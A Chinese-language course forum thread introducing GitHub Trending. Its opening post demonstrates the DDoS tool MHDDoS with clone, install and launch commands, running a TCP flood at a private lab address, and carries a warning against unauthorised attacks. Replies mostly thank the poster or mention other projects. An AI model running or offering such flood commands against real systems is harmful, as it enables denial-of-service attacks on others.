### DISCUSSION TITLE
查看GitHub上熱門的專案

### DISCUSSION THREAD

**Discussion by gnsJhenJie** [1101-GS4719-C/Python-Community-GS4719-C#482] [General]
除了自己學程式外，也應該看看世界上的大家都正在做什麼有趣的專案，其中一個快速的方式就是透過 [GitHub Trending](https://github.com/trending) 來看看目前在GitHub上熱門的專案  
<img width="1494" alt="Screen Shot 2022-03-16 at 15 12 24" src="https://user-images.githubusercontent.com/32983347/158535967-7efac5f8-118a-4816-9c84-fc8783640098.png">
如果只想看Python的專案，可以在Language選擇Python  
<img width="1494" alt="Screen Shot 2022-03-16 at 15 13 39" src="https://user-images.githubusercontent.com/32983347/158536226-c1e63ef1-ba1c-4574-9cad-902f4d885975.png">
那我們就來看看這個月最熱門的Python專案 **[MHDDoS](https://github.com/MHProDev/MHDDoS)** 吧  
# MHDDoS
如果想快速了解一個專案在做什麼，最快的方法就是看README.md了。
<img width="798" alt="Screen Shot 2022-03-16 at 15 17 47" src="https://user-images.githubusercontent.com/32983347/158536742-84ae2eeb-5b52-4ba0-af41-ba6c004f83c3.png">
可以看到這個專案是一個提供多達50種DDoS方法的攻擊工具，那我們就來玩玩看吧！  
### 安裝
```bash
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
python3 -m pip install -r requirements.txt
```
### **🧨🧨🧨強烈不建議用這個工具進行未經允許的攻擊ㄛ🧨🧨🧨**  
這邊選用TCP Flood Bypass 這個方法攻擊 10.115.197.241 並使用三個thread攻擊30秒
```bash
python3 start.py tcp 10.115.197.241 3 30
```
可以看到被攻擊電腦的網路流量就瞬間上升了
<img width="682" alt="Screen Shot 2022-03-16 at 15 40 16" src="https://user-images.githubusercontent.com/32983347/158540960-865aa6f4-2be9-4b99-a0c4-1524cf978ef9.png">

**Comment by lx3211** [comment]
謝謝分享增廣見聞的渠道
攻擊者會產生大量的封包或請求，使得目標系統無法負荷，難怪網路流量會暴增

**Comment by sean1325418** [comment]
現在想要DDOS別人也太容易了吧...完全不需要任何技術

**Comment by dayu1004** [comment]
雖然我對Github還不太熟悉，不過看到這個分享之後，就有管道可以去知道目前熱門的專案在做些甚麼了！真有趣！

**Comment by ThomasMeng0515** [comment]
原來Github有這種查看熱門專案的功能，我對Github操作都還不太熟悉，也不太知道要怎麼善加利用它，希望之後能熟悉操作，幫助自己能更有效率地學習~
謝謝分享!

**Comment by JSHT** [comment]
感謝分享，剛剛使用 github trend，看到稚暉君的專案 [Dummy-Robot](https://github.com/peng-zhihui/Dummy-Robot)，上到了前五。之前他做的 side-project 有 [硬核特製 NFC 門禁卡](https://www.youtube.com/watch?v=HhYiHb4BHeM)、[自動駕駛腳踏車](https://www.bilibili.com/video/BV1fV411x72a?spm_id_from=333.999.0.0)等，都是很厲害的 project。
這邊可以去 [B站](https://space.bilibili.com/20259914?spm_id_from=333.788.b_765f7570696e666f.1)、[Youtube](https://www.youtube.com/channel/UCBAdGeil51Iw4y29Sh9Y7hA) 看他介紹製作專案的影片。

**Comment by JunTingLin** [comment]
版主有介紹到要跟上最夯的開源專案可以去逛逛 [GitHub Trending](https://github.com/trending)
也可以參考這篇介紹兩個長歪的儲存庫😁 [🌋誰說github儲存庫只能放code!目前兩個最火的儲存庫~ ~~我想要發PR成為貢獻者~~ #492 ](https://github.com/NCU-GS4719-Python/Python-Community/discussions/492)

**Comment by ghost** [comment]
感覺DDOS技術門檻不高，惡意用途感覺會層出不窮

**Comment by awkward-willy** [comment]
感謝分享
剛剛實際逛了一下
發現許多有趣的專案
像是 [Deep Face Live](https://github.com/iperov/DeepFaceLive.git) 的換臉技術
讓我多了一個管道能知道這個領域的其他人在做些什麼

**Comment by Rosancl** [comment]
謝謝分享，一直都沒有很熟悉github的各種功能，這個方法提供我暑假打算要做side project的方向~~

**Comment by treeann** [comment]
github的功能應用我一直不熟悉 謝謝樓主分享ˋ

**Comment by jason79461385** [comment]
感謝分享，github這個社群真的可以逛出很多心得呢！

**Comment by 110409538** [comment]
github還有好多我沒發現的東西

**Comment by minniewei** [comment]
github上真的有許多的好東西

**Comment by Ben6uo** [comment]
謝謝分享 github就是個大寶富阿

**Comment by etin2468** [comment]
原來DDOS的門檻這麼低喔，難怪現在到處都有沒品的人在做攻擊

**Comment by Lynn12378** [comment]
感謝樓主分享關於github的功能

**Comment by Jimmy911218** [comment]
謝謝樓主的分享
